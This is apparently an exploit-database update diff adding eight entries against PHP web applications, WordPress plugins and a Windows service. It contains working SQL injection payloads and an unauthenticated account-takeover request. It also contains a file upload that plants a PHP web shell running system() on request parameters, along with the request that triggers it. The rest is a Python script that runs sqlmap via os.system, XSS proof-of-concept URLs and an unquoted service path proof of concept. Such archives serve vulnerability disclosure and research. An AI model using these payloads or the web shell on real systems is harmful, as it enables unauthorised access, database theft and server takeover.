DB: 2022-02-11

8 changes to exploits/shellcodes

Cain & Abel 4.9.56 - Unquoted Service Path
Hospital Management Startup 1.0 - 'Multiple' SQLi
Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)
Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection
WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)
WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)

exploits/php/webapps/50729.txt

@@ -0,0 +1,34 @@
+# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi
+# Exploit Author: nu11secur1ty
+# Date: 02.10.2022
+# Vendor: https://github.com/kabirkhyrul
+# Software: https://github.com/kabirkhyrul/HMS
+# CVE-2022-23366
+
+# Description:
+The loginid and password parameters from Hospital Management Startup
+1.0 appear to be vulnerable to SQL injection attacks.
+The attacker can retrieve all information from the administrator
+account of the system and he can use the information for malicious
+purposes!
+WARNING: If this is in some external domain, or some subdomain, or
+internal, this will be extremely dangerous!
+
+Status: CRITICAL
+
+
+[+] Payloads:
+
+```mysql
+---
+Parameter: loginid (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND
+(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND
+'sDHP'='sDHP&rememberme=on&submit=Login
+---
+
+```
+# Reproduce:
+https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366

exploits/php/webapps/50730.txt

@@ -0,0 +1,65 @@
+# Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)
+# Date: 9/02/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: XAMPP, Linux
+
+
+Home Owners Collection Management System is vulnerable to unauthenticated account takeover.
+An attacker can takeover any registered 'Staff' user account by just sending below POST request
+By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters
+
+#Steps to Reproduce
+
+1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters.
+
+2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password
+
+
+==============================================
+
+POST /hocms/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391
+Content-Length: 899
+Origin: http://localhost
+Connection: close
+Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju
+
+-----------------------------8012296389370411172619882391
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------8012296389370411172619882391
+Content-Disposition: form-data; name="firstname"
+
+hi
+-----------------------------8012296389370411172619882391
+Content-Disposition: form-data; name="lastname"
+
+test
+-----------------------------8012296389370411172619882391
+Content-Disposition: form-data; name="username"
+
+saud
+-----------------------------8012296389370411172619882391
+Content-Disposition: form-data; name="password"
+
+saud
+-----------------------------8012296389370411172619882391
+Content-Disposition: form-data; name="type"
+
+1
+-----------------------------8012296389370411172619882391
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------8012296389370411172619882391--

exploits/php/webapps/50731.txt

@@ -0,0 +1,119 @@
+# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 9/02/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: XAMPP, Linux
+
+# Request sent as base user
+
+POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215
+Content-Length: 769
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/hocms/admin/?page=system_info
+Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju
+
+
+-----------------------------31935477191495174627236953215
+Content-Disposition: form-data; name="name"
+
+
+
+Home Owners Collection Management System'
+
+-----------------------------31935477191495174627236953215
+Content-Disposition: form-data; name="short_name"
+
+
+
+HOCMS  - PHP
+
+-----------------------------31935477191495174627236953215
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+
+
+
+-----------------------------31935477191495174627236953215
+Content-Disposition: form-data; name="cover"; filename="cmd.php"
+Content-Type: application/x-php
+
+
+
+<?php
+if($_REQUEST['s']) {
+  system($_REQUEST['s']);
+  } else phpinfo();
+?>
+</pre>
+</body>
+</html>
+
+
+-----------------------------31935477191495174627236953215--
+
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Wed, 09 Feb 2022 09:32:16 GMT
+Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
+X-Powered-By: PHP/8.1.2
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 1
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+
+1
+
+
+# ------------------------------------------------------------------------------------------
+# Request to webshell
+# ------------------------------------------------------------------------------------------
+
+GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju
+Upgrade-Insecure-Requests: 1
+
+
+# ------------------------------------------------------------------------------------------
+# Webshell response
+# ------------------------------------------------------------------------------------------
+
+HTTP/1.1 200 OK
+Date: Wed, 09 Feb 2022 09:39:06 GMT
+Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
+X-Powered-By: PHP/8.1.2
+Access-Control-Allow-Origin: *
+Content-Length: 33
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+
+0xSaudi
+</pre>
+</body>
+</html>

exploits/php/webapps/50732.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection
+# Date: 9/02/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: XAMPP, Windows 10
+
+
+# Vulnerable Code
+
+line 68 in file "/hocms/admin/members/view_member.php"
+
+$collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc");
+
+
+# Sqlmap command:
+
+sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch
+
+# Output:
+
+Parameter: id (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member

exploits/php/webapps/50733.py

@@ -0,0 +1,64 @@
+# Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)
+# Date 08.02.2022
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://ays-pro.com/
+# Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip
+# Version: < 2.8.2
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2021-24931
+# CWE: CWE-89
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md
+
+'''
+Description:
+The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the
+sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated
+and authenticated users) before using it in a SQL statement, leading to an SQL injection.
+'''
+
+banner = '''
+
+ .--. .-..-. .--.       .---.  .--. .---.   ,-.       .---.   .-. .--. .----.  ,-.
+: .--': :: :: .--'      `--. :: ,. :`--. :.'  :       `--. : .'.': .; :`--  ;.'  :
+: :   : :: :: `;  _____   ,',': :: :  ,',' `: : _____   ,','.'.'_`._, : .' '  `: :
+: :__ : `' ;: :__:_____:.'.'_ : :; :.'.'_   : ::_____:.'.'_ :_ ` :  : : _`,`.  : :
+`.__.' `.,' `.__.'      :____;`.__.':____;  :_;       :____;  :_:   :_:`.__.'  :_;
+
+						[+] Copy Content Protection and Content Locking - SQL Injection
+						[@] Developed by Ron Jost (Hacker5preme)
+
+'''
+print(banner)
+import argparse
+from datetime import datetime
+import os
+
+# User-Input:
+my_parser = argparse.ArgumentParser(description= 'Copy Content Protection and Content Locking SQL-Injection (unauthenticated)')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+
+# Exploit:
+print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
+print('[*] Payload for SQL-Injection:')
+exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" '
+print('    Sqlmap options:')
+print('     -a, --all           Retrieve everything')
+print('     -b, --banner        Retrieve DBMS banner')
+print('     --current-user      Retrieve DBMS current user')
+print('     --current-db        Retrieve DBMS current database')
+print('     --passwords         Enumerate DBMS users password hashes')
+print('     --tables            Enumerate DBMS database tables')
+print('     --columns           Enumerate DBMS database table column')
+print('     --schema            Enumerate DBMS schema')
+print('     --dump              Dump DBMS database table entries')
+print('     --dump-all          Dump all DBMS databases tables entries')
+retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
+exploitcode = exploitcode_url +  retrieve_mode + ' --answers="follow=Y" --batch -v 0'
+os.system(exploitcode)
+print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

exploits/php/webapps/50734.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
+# Date: 2022-02-07
+# Author: Milad karimi
+# Software Link: https://wordpress.org/plugins/contact-forms-builder/
+# Version: 1.6.1
+# Tested on: Windows 11
+# CVE: N/A
+
+1. Description:
+This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
+
+2. Proof of Concept:
+http://localhost/code_generator.php?form_id=<script>alert('xss')</script>

exploits/php/webapps/50735.txt

@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)
+# Date: 2022-02-07
+# Author: Milad karimi
+# Software Link: https://wordpress.org/plugins/jetpack
+# Version: 9.1
+# Tested on: Windows 11
+# CVE: N/A
+
+1. Description:
+This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
+
+2. Proof of Concept:
+http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert("BY Ex3ptionaL")</script>

exploits/windows/local/50728.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Cain & Abel 4.9.56 - Unquoted Service Path
+# Exploit Author: Aryan Chehreghani
+# Date: 2022-02-08
+# Software Link: https://www.malavida.com/en/soft/cain-and-abel
+# Version: 4.9.56
+# Tested on: Windows 10 x64
+
+# PoC
+
+SERVICE_NAME: Abel
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Cain\Abel64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Abel
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem

files_exploits.csv

@@ -11438,6 +11438,7 @@ id,file,description,date,author,type,platform,port
 50691,exploits/windows/local/50691.txt,"Mozilla Firefox 67 - Array.pop JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows,
 50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",1970-01-01,LiquidWorm,local,macos,
 50708,exploits/windows/local/50708.txt,"FLAME II MODEM USB - Unquoted Service Path",1970-01-01,"Ismael Nava",local,windows,
+50728,exploits/windows/local/50728.txt,"Cain & Abel 4.9.56 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44802,3 +44803,10 @@ id,file,description,date,author,type,platform,port
 50725,exploits/php/webapps/50725.txt,"Exam Reviewer Management System 1.0 - ‘id’ SQL Injection",1970-01-01,"Juli Agarwal",webapps,php,
 50726,exploits/php/webapps/50726.txt,"Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Juli Agarwal",webapps,php,
 50727,exploits/php/webapps/50727.txt,"AtomCMS v2.0 - SQLi",1970-01-01,"Luca Cuzzolin",webapps,php,
+50729,exploits/php/webapps/50729.txt,"Hospital Management Startup 1.0 - 'Multiple' SQLi",1970-01-01,nu11secur1ty,webapps,php,
+50730,exploits/php/webapps/50730.txt,"Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)",1970-01-01,"Saud Alenazi",webapps,php,
+50731,exploits/php/webapps/50731.txt,"Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Saud Alenazi",webapps,php,
+50732,exploits/php/webapps/50732.txt,"Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection",1970-01-01,"Saud Alenazi",webapps,php,
+50733,exploits/php/webapps/50733.py,"WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,
+50734,exploits/php/webapps/50734.txt,"WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
+50735,exploits/php/webapps/50735.txt,"WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,